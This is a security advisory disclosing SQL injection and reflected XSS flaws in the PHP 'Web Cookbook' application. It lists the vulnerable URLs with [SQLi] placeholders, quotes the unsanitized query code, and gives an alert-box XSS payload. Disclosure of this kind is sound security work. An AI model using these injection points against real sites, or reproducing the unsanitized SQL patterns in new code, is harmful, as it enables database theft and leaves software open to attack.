# Exploit Title: Web Cookbook Multiple SQL Injection
# Date: 2013/3/12
# Exploit Author: Saadat Ullah - saadi_linux@rocketmail.com
# Software Link: http://sourceforge.net/projects/webcookbook/
# Author HomePage: http://security-geeks.blogspot.com/
# Tested on: Server: Apache/2.2.15 (CentOS) PHP/5.3.3
# SQL Injection
http://localhost/cook/searchrecipe.php?sstring=[SQLi]
http://localhost/cook/showtext.php?mode=[SQLi]
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
http://localhost/cook/showtext.php?mode=[SQLi]
#Proof Of Concept
In showtext.php
Code:
// Untrusted query-string value, read with no validation or type check.
$mode = $_GET["mode"];
.
.
// $mode is passed through unchanged; showText() interpolates it into the
// SQL statement below (origin of $art is not shown in this excerpt).
showText($mode, $art);
.
.
function showText($kategorie, $art) {
initDB();
echo "<div class=\"rdisplay\">\n";
$query = "SELECT * FROM dat_texte WHERE id = $kategorie"; //using a non sanitize field in the querry
$result = mysql_query($query);
.
.
All GET fields are vulnerable to SQL injection.
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
# Proof Of Concept
In searchrecipe.php
// Query-string value taken as-is; later embedded in a LIKE pattern without escaping.
$title = $_GET['title'];
// Query-string value taken as-is (no validation).
$prefix = $_GET['prefix'];
// Query-string value taken as-is (no validation).
$preparation = $_GET['preparation'];
// Query-string value taken as-is (no validation).
$postfix = $_GET['postfix'];
// Query-string value taken as-is (no validation).
$tipp = $_GET['tipp'];
// Query-string value taken as-is (no validation).
$ingredient = $_GET['ingredient'];
.
.
.
if ($title != "") {
// $title is embedded in the SQL fragment as-is (no escaping, no parameter
// binding): this is the injection point for the title parameter.
$sstring = "a.title LIKE '%$title%' ";
}
.
.
// $sstring, still carrying the raw $title, is handed to searchRecipe(),
// which interpolates it into its query.
searchRecipe($mode, $sstring);
.
.
In function searchRecipe:
// $sstring is interpolated directly into the statement twice, with no
// escaping or parameter binding. Note also the operator precedence: AND binds
// tighter than OR, so the a.id = b.recipe join condition constrains only the
// b.description branch; the a.title branch matches across every ingredient row.
$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";
http://localhost/cook/searchrecipe.php?sstring=[SQLi]
Proof Of Concept
// Raw query-string value; no validation before it reaches the query.
$sstring = $_GET['sstring'];
if ($sstring != "") {
// First argument is the mode (cf. searchRecipe($mode, $sstring) above);
// $sstring is passed unchanged and interpolated into the query in searchRecipe().
searchRecipe(0, $sstring);
.
.
.
// Same statement as in the title case: $sstring is interpolated twice with no
// escaping or parameter binding, and AND binds tighter than OR, so the
// a.id = b.recipe join condition applies only to the b.description branch.
$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";
A simple non-persistent (reflected) XSS
http://localhost/cook/searchrecipe.php?mode=1&title=<script>alert('hi');</script>&prefix=&preparation=&postfix=&tipp=&ingredient=
#Independent Pakistani Security Researcher